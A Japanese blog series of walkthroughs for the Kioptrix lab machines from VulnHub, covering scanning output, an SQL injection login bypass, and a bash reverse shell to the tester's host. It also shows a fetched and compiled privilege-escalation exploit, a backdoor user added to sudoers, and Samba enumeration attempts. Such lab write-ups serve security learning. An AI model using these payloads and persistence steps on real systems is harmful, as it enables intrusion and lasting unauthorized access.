+ http://192.168.3.30/manual/ja/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/faq/
+ http://192.168.3.30/manual/ja/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/howto/
==> DIRECTORY: http://192.168.3.30/manual/ja/images/
+ http://192.168.3.30/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.3.30/manual/ja/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ja/misc/
==> DIRECTORY: http://192.168.3.30/manual/ja/mod/
==> DIRECTORY: http://192.168.3.30/manual/ja/programs/
+ http://192.168.3.30/manual/ja/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ja/style/

---- Entering directory: http://192.168.3.30/manual/ko/ ----
+ http://192.168.3.30/manual/ko/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/developer/
+ http://192.168.3.30/manual/ko/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/faq/
+ http://192.168.3.30/manual/ko/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/howto/
==> DIRECTORY: http://192.168.3.30/manual/ko/images/
+ http://192.168.3.30/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.3.30/manual/ko/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ko/misc/
==> DIRECTORY: http://192.168.3.30/manual/ko/mod/
==> DIRECTORY: http://192.168.3.30/manual/ko/programs/
+ http://192.168.3.30/manual/ko/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ko/style/

---- Entering directory: http://192.168.3.30/manual/misc/ ----
+ http://192.168.3.30/manual/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/mod/ ----
+ http://192.168.3.30/manual/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/programs/ ----
+ http://192.168.3.30/manual/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/ru/ ----
+ http://192.168.3.30/manual/ru/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/developer/
+ http://192.168.3.30/manual/ru/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/faq/
+ http://192.168.3.30/manual/ru/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/howto/
==> DIRECTORY: http://192.168.3.30/manual/ru/images/
+ http://192.168.3.30/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.3.30/manual/ru/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ru/misc/
==> DIRECTORY: http://192.168.3.30/manual/ru/mod/
==> DIRECTORY: http://192.168.3.30/manual/ru/programs/
+ http://192.168.3.30/manual/ru/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ru/style/

---- Entering directory: http://192.168.3.30/manual/ssl/ ----
+ http://192.168.3.30/manual/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/de/developer/ ----
+ http://192.168.3.30/manual/de/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/de/faq/ ----
+ http://192.168.3.30/manual/de/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/de/howto/ ----
+ http://192.168.3.30/manual/de/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/de/misc/ ----
+ http://192.168.3.30/manual/de/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/de/mod/ ----
+ http://192.168.3.30/manual/de/mod/index.html (CODE:200|SIZE:13561)

---- Entering directory: http://192.168.3.30/manual/de/programs/ ----
+ http://192.168.3.30/manual/de/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/de/ssl/ ----
+ http://192.168.3.30/manual/de/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/en/developer/ ----
+ http://192.168.3.30/manual/en/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/en/faq/ ----
+ http://192.168.3.30/manual/en/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/en/howto/ ----
+ http://192.168.3.30/manual/en/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/en/misc/ ----
+ http://192.168.3.30/manual/en/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/en/mod/ ----
+ http://192.168.3.30/manual/en/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/en/programs/ ----
+ http://192.168.3.30/manual/en/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/en/ssl/ ----
+ http://192.168.3.30/manual/en/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/fr/developer/ ----
+ http://192.168.3.30/manual/fr/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/fr/faq/ ----
+ http://192.168.3.30/manual/fr/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/fr/howto/ ----
+ http://192.168.3.30/manual/fr/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/fr/misc/ ----
+ http://192.168.3.30/manual/fr/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/fr/mod/ ----
+ http://192.168.3.30/manual/fr/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/fr/programs/ ----
+ http://192.168.3.30/manual/fr/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/fr/ssl/ ----
+ http://192.168.3.30/manual/fr/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/developer/ ----
+ http://192.168.3.30/manual/ja/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ja/faq/ ----
+ http://192.168.3.30/manual/ja/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/ja/howto/ ----
+ http://192.168.3.30/manual/ja/howto/index.html (CODE:200|SIZE:5607)

---- Entering directory: http://192.168.3.30/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/misc/ ----
+ http://192.168.3.30/manual/ja/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ja/mod/ ----
+ http://192.168.3.30/manual/ja/mod/index.html (CODE:200|SIZE:13298)

---- Entering directory: http://192.168.3.30/manual/ja/programs/ ----
+ http://192.168.3.30/manual/ja/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/ja/ssl/ ----
+ http://192.168.3.30/manual/ja/ssl/index.html (CODE:200|SIZE:3957)

---- Entering directory: http://192.168.3.30/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ko/developer/ ----
+ http://192.168.3.30/manual/ko/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ko/faq/ ----
+ http://192.168.3.30/manual/ko/faq/index.html (CODE:200|SIZE:3371)

---- Entering directory: http://192.168.3.30/manual/ko/howto/ ----
+ http://192.168.3.30/manual/ko/howto/index.html (CODE:200|SIZE:5299)

---- Entering directory: http://192.168.3.30/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ko/misc/ ----
+ http://192.168.3.30/manual/ko/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ko/mod/ ----
+ http://192.168.3.30/manual/ko/mod/index.html (CODE:200|SIZE:12795)

---- Entering directory: http://192.168.3.30/manual/ko/programs/ ----
+ http://192.168.3.30/manual/ko/programs/index.html (CODE:200|SIZE:4543)

---- Entering directory: http://192.168.3.30/manual/ko/ssl/ ----
+ http://192.168.3.30/manual/ko/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ru/developer/ ----
+ http://192.168.3.30/manual/ru/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ru/faq/ ----
+ http://192.168.3.30/manual/ru/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/ru/howto/ ----
+ http://192.168.3.30/manual/ru/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ru/misc/ ----
+ http://192.168.3.30/manual/ru/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ru/mod/ ----
+ http://192.168.3.30/manual/ru/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/ru/programs/ ----
+ http://192.168.3.30/manual/ru/programs/index.html (CODE:200|SIZE:5016)

---- Entering directory: http://192.168.3.30/manual/ru/ssl/ ----
+ http://192.168.3.30/manual/ru/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Mar 28 11:33:05 2020
DOWNLOADED: 262884 - FOUND: 102

 

結果、めぼしいものは特になし

 

 

%nikto 192.168.3.30

 

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.30
+ Target Hostname: 192.168.3.30
+ Target Port: 80
+ Start Time: 2020-03-28 20:56:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2020-03-28 20:58:08 (GMT-4) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 

結果、こちらも特にめぼしいものはなし

 

 

普通にブラウザで確認すると、ログイン画面らしきものが出てくる

f:id:syachineko:20200331091547p:plain

 

 

侵入

SSH上での侵入を試みる

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh 192.168.3.30
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
kali@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh admin@192.168.3.30
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
admin@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh root@192.168.3.30
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
root@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$

 

PW認証が使えるため、ブルートフォースも有効な気がするが、後回し

 

 

 

ブラウザ上での侵入を試みる

いくつかのユーザ名によるログインは不発に終わったので、

SQLインジェクションを試みる

 

ID: ' OR 1 = 1 --

PW: ' OR 1 = 1 --

 

結果、認証ページのバイパスに成功

次画面として、WebConsole画面が表示される

f:id:syachineko:20200331093037p:plain

 

pentestmonkyより、revease shellのcheat xheetを参考にして

bashのリバースシェルを試す

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

 

bashはこれ

bash -i >& /dev/tcp/192.168.3.27/8080 0>&1

 

 

kali側で、ncをつかって待ち構えておく

% nc -l 192.168.3.27 -p 8080

 

 

その後、上記のリバースシェル用bashに ; を追加して実行

ブラウザが読み込み中で止まり、kali側でbashが立ち上がった

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ nc -l -p 8080
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$

 

権限昇格

権限昇格を狙って探索を行うと、以下のファイルにOSの情報が記載されている

 % cat /etc/redhat-release

bash-3.00$ cat redhat-release
CentOS release 4.5 (Final)
 

 

記載されたバージョンで権限昇格が可能か、

searchsploitで検索したところ、コードが見つかった

f:id:syachineko:20200401001001p:plain

これの上側のexplot code
  

 

該当コードがローカルで動作するものなので、

Kaliから簡易サーバーをたてて転送する

 % python -m SimpleHTTPServer 8080

 

 

サーバ上で/tmpに移動して、

% wget "http://192.168.3.27:8080/9542.c

 

 

送り込んだコードをコンパイルして、実行

 gcc -o exploit 9542.c

 ./exploit

 

 

権限取得まで行うことができた

f:id:syachineko:20200401001531p:plain


  

この後

バックドアの作成

・ほかの人のwriteupを確認して勉強

・使用済みツールを使わない攻略

   などなどやりたい 

 

以上

 

 

 

 

 

 

 

 

Kioptrix1 ルート権限掌握後にやること(ユーザ作成、SSH接続、他)

ルート権限をとりあえず奪取したけど、、、

※というか、OpenFuckで一発とかちょっとあっけなさすぎる・・・

 

なので、その後のバックドアつくりとか、確認

あと、sambaがうまく動いていなかったのでそこも確認したい

 

ユーザの作成

ユーザの作成にあたって、OpenFuckにて権限rootで侵入した状態を考える

ユーザの追加として、useraddを実行したが、見つからない

 

ここで、ダメ元でいくつかのPATHを追加してみる

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

 

sbinは、通常rootであればPATHが通っているものらしいですが・・・

 

 

これで再度試すと、useraddが実行できました

 

useradd kali

passwd kali

 

 

バックドア用のユーザ作成が完了しました

 

SSHの許可

exploitコードを用いてrootでログインできたのですが、

依然としてリバースシェル状態であり、ダイレクトに接続できてません

先ほど作成したユーザに遠隔からSSHでログインしたい・・・

 

 

 

が、エラーではじかれます

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1$ ssh test@192.168.3.29
Unable to negotiate with 192.168.3.29 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

 

 

ちょっとこのエラーよくわからない・・・

接続先から、鍵交換の手法についていくつか選択支があるけど、それらがない??

 

 

googlingしたところ、以下が見つかりました

https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0

 

 

サーバ側から要求される鍵交換のプロトコルが古すぎることが原因

たしかにKioptrixはだいぶ古いマシンなので、それも納得ですわ・・・

ということで、古い、かつ要求されているKeyExchangeを追加する

 

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 192.168.3.29

 

すると、さらに別のエラー

kali@kali:/etc/ssh$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 192.168.3.29
Unable to negotiate with 192.168.3.29 port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc@lysator.liu.se

 

 

これも同様に、サーバ側が要求する暗号化方式が古すぎてNGとなっている例

引数で追加してあげる

kali@kali:/etc/ssh$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oCiphers=+aes128-cbc 192.168.3.29
The authenticity of host '192.168.3.29 (192.168.3.29)' can't be established.
RSA key fingerprint is SHA256:VDo/h/SG4A6H+WPH3LsQqw1jwjyseGYq9nLeRWPCY/A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.29' (RSA) to the list of known hosts.
kali@192.168.3.29's password:
unknown terminal "xterm-256color"
unknown terminal "xterm-256color"
[kali@kioptrix kali]$

 

ようやくつながった!!!

 

 

 

さて、別でrootで入っている状況で、

/etc/sudoersの設定を変更してあげる

 

cd /etc

echo "kali ALL=(ALL) ALL" >> sudoers

 

 

これでいつでもSSHログインからのroot権限昇格が可能になりました

バックドアの完成です

 

[kali@kioptrix /]$
[kali@kioptrix /]$ sudo su
unknown terminal "xterm-256color"
unknown terminal "xterm-256color"
[root@kioptrix /]#

 

 

※暗号化については以下の記事で勉強予定

qiita.com

 

sambaサービスの確認

 SSHで無事ログインできたので、

samba含めてサービスを確認する

 

[root@kioptrix /]# service --status-all
anacron dead but subsys locked
apmd (pid 700) is running...
arpwatch is stopped
atd (pid 915) is running...
Configured Mount Points:
------------------------

Active Mount Points:
--------------------
Broadcom BCM5820 init script
Copyright (c) 2001 Broadcom Corporation
usage: bcm5820 [start|stop|restart|condrestart]
crond (pid 867) is running...
gpm (pid 849) is running...
httpd (pid 1333 1332 1331 1330 1328 1326 925) is running...
identd is stopped
ipchains: Incompatible with this kernel
Table: filter
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Table: nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Table: mangle
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
No status available for this package
lpd is stopped
Configured devices:
lo eth0
Currently active devices:
eth0 lo
rpc.mountd is stopped
nfsd is stopped
rpc.rquotad is stopped
rpc.statd (pid 588) is running...
nscd is stopped
portmap (pid 560) is running...
postmaster is stopped
The random data source exists
rpc.rstatd is stopped
rpc.rusersd is stopped
rpc.rwalld is stopped
rwhod is stopped
sendmail (pid 830) is running...
smbd (pid 923) is running...
nmbd (pid 921) is running...
snmpd is stopped
squid is stopped
FATAL: Could not determine fully qualified hostname. Please set 'visible_hostname'

Squid Cache (Version 2.4.STABLE1): Terminated abnormally.
CPU Usage: 0.010 seconds = 0.000 user + 0.010 sys
Maximum Resident Size: 0 KB
Page faults with physical i/o: 304
sshd (pid 6243 1113) is running...
syslogd (pid 535) is running...
klogd (pid 540) is running...
tux is stopped
xfs is stopped
xinetd (pid 789) is running...
ypbind is stopped
rpc.yppasswdd is stopped
ypserv is stopped
ypxfrd is stopped

 

 

smbd...動いてるなぁ・・・

 

[root@kioptrix /]# service smb status
smbd (pid 923) is running...
nmbd (pid 921) is running...
[root@kioptrix /]# ps aux | grep 923
root 923 0.0 1.9 3256 1192 ? S 03:11 0:00 smbd
[root@kioptrix /]# service smb restart
Shutting down SMB services: [ OK ]
Shutting down NMB services: [ OK ]
Starting SMB services: [ OK ]
Starting NMB services: [ OK ]
[root@kioptrix /]# ps aux | grep 923
[root@kioptrix /]# service smb status
smbd (pid 7778) is running...
nmbd (pid 7783) is running...
[root@kioptrix /]#

 

 

試しにrestartしたけどダメでした・・・

 

 

 改めてenum4linuxのエラーを確認する

 

...
=====================================
| Session Check on 192.168.3.29 |
=====================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

...

 

 

あー、これって普通にユーザ名/PWの組み合わせが間違ってるってことっすね・・・

あれ?でも一部のWriteUpでは普通に出てるけどなんでなんじゃろ?

 

 

 

でもまぁとにかく、

バックドアまで作り終えたので完了とさせていただきますわぁ

 

 

 

次回もしかしたら脆弱性をなくすためのアップデート大作戦するかも

 

 

以上!

Kioptrix1 偵察時に利用するツール(dirbuster, nbtscan, rpcclient, enum4linux)

色々な人のWriteUpを見て、勉強する

 

参考

新たに参考にしたWriteUpは以下

https://blog.bladeism.com/kioptrix-level-1/

https://blog.roskyfrosky.com/vulnhub/2017/04/01/Kioptrix1.0-vulnhub.html

 

 

侵入時に使用されているコマンド

 

% dirbuster http://192.168.3.29/

% nbtscan 192.168.3.29

% rpcclient -U "" 192.168.3.29

% enum4linux 192.168.3.29

 

ひとつずつ動作を確認してみる

 

dirbuster

wordlistを指定して、ディレクトリおよび有効なページを確認する

dirbと同じような使い勝手だが、Windowが開くため裏で回しておきやすいか?

今まではdirbを使っており、特にこちらのツールに乗り換えることもないか・・・

 

 

nbtscan

 

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ nbtscan 192.168.3.29
Doing NBT name scan for addresses from 192.168.3.29

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.3.29 KIOPTRIX <server> KIOPTRIX 00:00:00:00:00:00

 

rpcclient

RPCと呼ばれる通信プロトコルを使うためのツール

sambaシステムの一つ、らしい

http://www.samba.gr.jp/project/translation/3.5/htmldocs/manpages-3/rpcclient.1.html

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ rpcclient -U "" 192.168.3.29
Enter WORKGROUP\'s password:
d
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT

 

下記にもある通り、どうやら私のVM,samba調子悪いみたいだ・・・

 

 enum4linux

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ enum4linux 192.168.3.29
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Mar 29 01:04:35 2020

==========================
| Target Information |
==========================
Target ........... 192.168.3.29
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================
| Enumerating Workgroup/Domain on 192.168.3.29 |
====================================================
[+] Got domain/workgroup name: MYGROUP

============================================
| Nbtstat Information for 192.168.3.29 |
============================================
Looking up status of 192.168.3.29
KIOPTRIX <00> - B <ACTIVE> Workstation Service
KIOPTRIX <03> - B <ACTIVE> Messenger Service
KIOPTRIX <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MYGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MYGROUP <1d> - B <ACTIVE> Master Browser
MYGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 192.168.3.29 |
=====================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

 

 

私の環境だとSession Check部分がエラーになっているのだが、

本来はその先が確認できて、sambaのバージョンが2.2.1aであることが確認できるらしい

うーん、何が違うんだろう???

ちなみに、参考2つ目のWriteUpも確認したが、

smbclientの接続がタイムアウトとなってしまう

 

おそらく、sambaのクライアントがうまく動いていないっぽい??

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1$ sudo smbclient -L 192.168.3.29
protocol negotiation failed: NT_STATUS_IO_TIMEOUT

 

ということで、おそらく2.2.1aの脆弱性を突いても、

おそらく抜けないんじゃないかぁと

 

 

以上